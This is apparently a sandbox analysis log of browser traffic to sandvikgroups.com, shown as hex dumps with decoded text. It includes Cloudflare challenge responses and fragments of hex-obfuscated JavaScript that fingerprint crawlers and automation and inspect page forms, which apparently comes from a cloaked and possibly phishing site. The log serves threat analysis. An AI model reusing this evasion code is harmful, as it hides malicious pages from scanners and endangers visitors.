                                        2025-01-07 21:06:17 UTC5421OUTData Raw: 35 33 37 38 33 66 37 38 36 63 63 38 34 33 36 65 30 63 30 61 31 35 66 34 39 37 39 64 64 31 37 36 65 32 64 62 38 34 32 38 62 63 31 39 36 35 66 34 38 65 37 34 65 36 37 65 66 38 37 62 65 35 66 39 3d 79 58 72 5a 6b 6d 62 62 6d 68 66 31 71 62 61 4e 68 65 31 33 67 58 6c 75 77 43 39 70 56 76 6e 72 79 54 5f 39 4a 33 31 6b 32 53 67 2d 31 37 33 36 32 38 33 39 35 36 2d 31 2e 32 2e 31 2e 31 2d 42 36 65 66 47 31 78 71 7a 6f 64 59 47 69 4c 79 4d 74 6a 6c 30 30 2e 4c 66 77 68 79 6b 6b 61 78 67 65 53 52 35 39 48 48 4f 58 39 76 65 69 34 75 61 77 76 36 4a 74 45 62 52 6b 43 4c 59 49 6f 4d 71 39 6e 4d 6f 71 78 78 46 7a 74 57 7a 76 56 55 34 70 75 41 52 46 43 51 50 58 41 69 48 31 61 4d 44 30 59 31 6d 70 73 5a 4a 68 75 64 6f 78 5a 30 37 43 64 6a 46 55 38 64 6f 62 38 4d 6a 48 55
                                        Data Ascii: 53783f786cc8436e0c0a15f4979dd176e2db8428bc1965f48e74e67ef87be5f9=yXrZkmbbmhf1qbaNhe13gXluwC9pVvnryT_9J31k2Sg-1736283956-1.2.1.1-B6efG1xqzodYGiLyMtjl00.LfwhykkaxgeSR59HHOX9vei4uawv6JtEbRkCLYIoMq9nMoqxxFztWzvVU4puARFCQPXAiH1aMD0Y1mpsZJhudoxZ07CdjFU8dob8MjHU
                                        2025-01-07 21:06:18 UTC1363INHTTP/1.1 503 Service Temporarily Unavailable
                                        Date: Tue, 07 Jan 2025 21:06:18 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.sandvikgroups.com; Priority=High; HttpOnly; Secure; SameSite=None
                                        Set-Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; Path=/; Expires=Wed, 07-Jan-26 21:06:17 GMT; Domain=.sandvikgroups.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Set-Cookie: D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; path=/; expires=Wed, 08-Jan-25 21:06:13 GMT; Max-Age=86400;
                                        Set-Cookie: a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; path=/; expires=Wed, 08-Jan-25 21:06:13 GMT; Max-Age=86400;
                                        2025-01-07 21:06:18 UTC1063INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 37 57 4a 38 65 47 7a 74 4d 53 45 56 35 66 5f 42 47 68 74 39 68 59 41 6f 69 6a 45 3d 31 37 33 36 33 37 30 33 37 33 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 38 2d 4a 61 6e 2d 32 35 20 32 31 3a 30 36 3a 31 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 38 36 34 30 30 3b 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4b 72 6c 4a 4f 53 2d 65 45 37 37 35 59 67 59 6d 32 68 70 44 5a 55 6b 52 54 76 63 3d 66 52 34 4f 5a 45 6b 5a 37 66 37 44 41 4a 52 6c 62 6e 66 2d 42 6e 52 63 64 79 49 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 38 2d 4a 61 6e 2d 32 35 20 32 31 3a 30 36 3a 31 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 38 36 34 30 30 3b 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69
                                        Data Ascii: Set-Cookie: 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; path=/; expires=Wed, 08-Jan-25 21:06:13 GMT; Max-Age=86400;Set-Cookie: KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; path=/; expires=Wed, 08-Jan-25 21:06:13 GMT; Max-Age=86400;X-Frame-Opti
                                        2025-01-07 21:06:18 UTC1369INData Raw: 33 33 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                        Data Ascii: 33e3<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                        2025-01-07 21:06:18 UTC1369INData Raw: 36 33 5c 78 36 38 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 38 5c 78 32 32 5c 78 36 46 5c 78 36 45 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 39 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 36 33 5c 78 36 38 5c 78 36 31 5c 78 36 45 5c 78 36 37 5c 78 36 35 5c 78 32 32 5c 78 32 43 5c 78 32 30 5c 78 36 32 5c 78 32 39 5c 78 37 44 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 32 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                        Data Ascii: 63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\
                                        2025-01-07 21:06:18 UTC1369INData Raw: 37 5c 78 33 42 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 37 30 5c 78 36 39 5c 78 37 32 5c 78 36 35 5c 78 37 33 5c 78 33 44 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 35 37 5c 78 36 35 5c 78 36 34 5c 78 32 43 5c 78 32 30 5c 78 33 30 5c 78 33 38 5c 78 32 44 5c 78 34 41 5c 78 36 31 5c 78 36 45 5c 78 32 44 5c 78 33 32 5c 78 33 35 5c 78 32 30 5c 78 33 32 5c 78 33 31 5c 78 33 41 5c 78 33 30 5c 78 33 36 5c 78 33 41 5c 78 33 31 5c 78 33 34 5c 78 32 30 5c 78 34 37 5c 78 34 44 5c 78 35 34 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 34 5c 78 36 38 5c 78 33 44 5c 78 32 46 5c 78 32 37 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                        Data Ascii: 7\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x57\x65\x64\x2C\x20\x30\x38\x2D\x4A\x61\x6E\x2D\x32\x35\x20\x32\x31\x3A\x30\x36\x3A\x31\x34\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x
                                        2025-01-07 21:06:18 UTC1369INData Raw: 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 35 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 46 5c 78 37 35 5c 78 36 33 5c 78 36 38 5c 78 36 41 5c 78 37 33 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 37 33 5c 78 37 30 5c 78 36 31 5c 78 37 37 5c 78 36 45 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 37 32 5c 78 36 38 5c 78 36 39 5c 78 36 45 5c 78 36 46 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36
                                        Data Ascii: \x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x6
                                        2025-01-07 21:06:18 UTC1369INData Raw: 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78 36 39
                                        Data Ascii: x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x69
                                        2025-01-07 21:06:18 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                        Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                        2025-01-07 21:06:18 UTC1369INData Raw: 41 5c 78 32 46 5c 78 32 46 5c 78 32 30 5c 78 34 33 5c 78 36 38 5c 78 36 35 5c 78 36 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78
                                        Data Ascii: A\x2F\x2F\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x
                                        2025-01-07 21:06:18 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                        Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.449791188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:17 UTC986OUTGET /favicon.ico HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sandvikgroups.com/?cono&__cf_chl_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpE
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:17 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:06:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:06:17 UTC957INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 53 67 62 38 63 32 36 65 69 6f 4e 48 57 79 5a 52 63 34 46 45 47 57 34 70 77 6f 49 50 2b 62 5a 41 73 49 34 62 6c 56 37 51 48 42 6f 33 70 42 73 4a 6b 65 71 43 47 6f 66 74 35 4a 64 38 55 2b 64 66 72 38 2b 72 38 52 51 67 50 62 66 4c 6b 68 34 73 4e 6d 43 33 73 6c 74 51 61 4b 32 76 37 72 46 41 59 6b 35 38 5a 64 38 79 55 2f 55 67 4b 73 53 45 66 32 6f 46 65 68 69 73 51 4f 37 37 79 6b 4b 45 6e 6b 51 37 67 58 50 47 34 4e 30 6f 68 58 74 6a 78 67 78 37 35 51 3d 3d 24 56 65 30 57 52 4d 5a 75 6d 7a 67 71 30 6a 48 50 41 32 50 54 43 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: Sgb8c26eioNHWyZRc4FEGW4pwoIP+bZAsI4blV7QHBo3pBsJkeqCGoft5Jd8U+dfr8+r8RQgPbfLkh4sNmC3sltQaK2v7rFAYk58Zd8yU/UgKsSEf2oFehisQO77ykKEnkQ7gXPG4N0ohXtjxgx75Q==$Ve0WRMZumzgq0jHPA2PTCQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:06:17 UTC1369INData Raw: 32 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 219e<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:06:17 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:06:17 UTC1369INData Raw: 4d 6a 32 6b 6d 32 46 49 49 73 2e 31 62 4f 6a 51 61 2e 78 61 4d 33 5f 59 59 4f 37 59 78 4b 63 34 41 38 55 56 46 6f 66 35 55 46 6a 45 50 77 6c 51 66 6d 39 66 32 39 53 6f 4a 73 4f 77 6d 69 6c 6e 5a 6f 49 5a 53 61 6a 79 38 73 72 43 66 69 61 52 72 44 46 4e 74 32 75 73 38 59 68 38 6e 4e 78 44 67 37 61 57 77 73 53 58 6d 6c 63 35 5f 74 76 35 2e 41 43 30 55 4c 6f 6d 70 5a 37 6b 44 4c 6a 46 44 46 4a 35 46 47 5f 2e 79 35 49 58 56 46 6d 2e 78 65 4c 70 55 6a 72 74 49 6e 4d 57 5a 6a 48 70 39 6f 6b 32 62 78 4a 77 67 48 50 53 73 4b 64 44 4f 75 68 4a 51 74 62 50 48 71 57 74 43 70 75 68 4a 48 43 43 53 59 44 63 39 51 6b 6d 73 52 32 76 35 6f 47 55 58 4f 35 36 64 68 35 64 4a 48 70 75 79 43 49 71 36 65 58 6d 4b 36 70 58 78 65 71 71 4e 65 78 4b 5f 52 62 44 31 62 37 55 59 57 72
                                        Data Ascii: Mj2km2FIIs.1bOjQa.xaM3_YYO7YxKc4A8UVFof5UFjEPwlQfm9f29SoJsOwmilnZoIZSajy8srCfiaRrDFNt2us8Yh8nNxDg7aWwsSXmlc5_tv5.AC0ULompZ7kDLjFDFJ5FG_.y5IXVFm.xeLpUjrtInMWZjHp9ok2bxJwgHPSsKdDOuhJQtbPHqWtCpuhJHCCSYDc9QkmsR2v5oGUXO56dh5dJHpuyCIq6eXmK6pXxeqqNexK_RbD1b7UYWr
                                        2025-01-07 21:06:17 UTC1369INData Raw: 6f 34 45 4f 4f 6b 53 4b 30 55 4a 38 39 66 71 72 35 55 78 77 46 71 46 44 4f 56 56 49 7a 52 6b 37 63 4a 2e 38 76 44 6e 54 61 73 5f 64 4c 58 63 4e 4e 30 69 2e 76 6e 4a 79 58 51 6b 4c 4c 6a 6c 4d 38 50 6a 68 7a 36 47 78 79 52 6a 34 46 61 52 5a 44 6a 65 52 52 66 34 65 58 6d 34 38 6f 73 51 64 34 66 42 2e 6d 32 39 5f 5f 62 6a 36 72 61 44 7a 48 6c 4f 57 34 36 52 76 33 73 4a 6d 43 35 4e 79 70 2e 67 6c 72 2e 32 47 77 67 50 71 43 50 4f 66 46 68 47 39 4e 4c 56 37 70 42 58 66 48 6d 47 47 72 44 70 31 66 58 6f 2e 6c 44 4c 32 54 6d 46 64 62 6e 78 4a 74 75 6f 58 49 76 51 59 66 47 55 52 36 49 39 39 6a 6e 36 43 45 51 57 6e 36 68 39 76 55 4f 63 6f 79 49 69 7a 45 76 51 72 35 49 53 63 77 33 57 46 76 6e 71 66 4f 72 42 48 7a 54 71 69 36 4a 73 43 4c 34 6a 38 59 6c 68 35 6f 4d 48
